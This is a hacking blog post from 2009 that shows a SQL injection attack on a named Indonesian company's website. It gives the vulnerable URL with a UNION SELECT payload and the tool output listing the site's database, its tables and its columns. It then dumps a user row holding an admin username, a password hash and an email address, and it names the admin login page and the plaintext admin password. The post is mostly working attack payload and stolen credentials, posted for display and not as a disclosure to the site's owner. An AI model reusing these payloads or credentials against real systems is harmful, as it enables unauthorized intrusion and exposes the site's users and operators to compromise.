viperfx07 is here to blog about hacking, cracking, websites, applications, Android, and much more.

Saturday, February 7, 2009

[SQLi] http://www.axis.co.id

12:02 PM Posted by viperfx07


Tools: schemafuzz.py v.50 mod by me
Admin panel: /login.php
Admin user/pwd: mommy:mommy
P.S.: this vuln has already been found, and it's on Google


[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:53:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Showing Tables & Columns from database "axiscoid_db"
[+] Number of Tables: 18


[Database]: axiscoid_db
[Table: Columns]
[0]tb_case: id,product,name,date,description,addtext
[1]tb_complain: id,userid,date,subject,complain
[2]tb_contact: Id,owner,name,email,mobile,ket
[3]tb_file: Id,name,type,folder,shared,created,update,owner,size
[4]tb_link: id,name,address,ket
[5]tb_mcontent: id,category,name,date,description,addtext
[6]tb_news: code,catagory,header,writer,date,news,pic,status,inc
[7]tb_news_status: code,name
[8]tb_news_topic: code,name
[9]tb_partner: id,name,email,address,phone,website,company
[10]tb_product: id,name,date,descreption,pic_front,logo,status,addtext
[11]tb_product_cat: code,name
[12]tb_product_status: code,name
[13]tb_promotion: id,word,date,picture,status,category,link
[14]tb_promotion_cat: id,name
[15]tb_search: id,keyword,address,desc,date
[16]tb_user: id,userid,password,nama,email,alamat,phone,mobile,tmp_lahir,tgl_lahir,status
[17]tb_user_cat: code,name

[-] [11:54:56]
[-] Total URL Requests 97
[-] Done


[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:56:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Dumping data from database "axiscoid_db" Table "tb_user"
[+] Column(s) ['userid', 'password', 'email']
[+] Number of Rows: 1

[0] mommy:2623e0d1f4e1a3093ee71672ec1c771a:mommy@axis.co.id:mommy@axis.co.id:

[-] [11:56:16]
[-] Total URL Requests 3
[-] Done
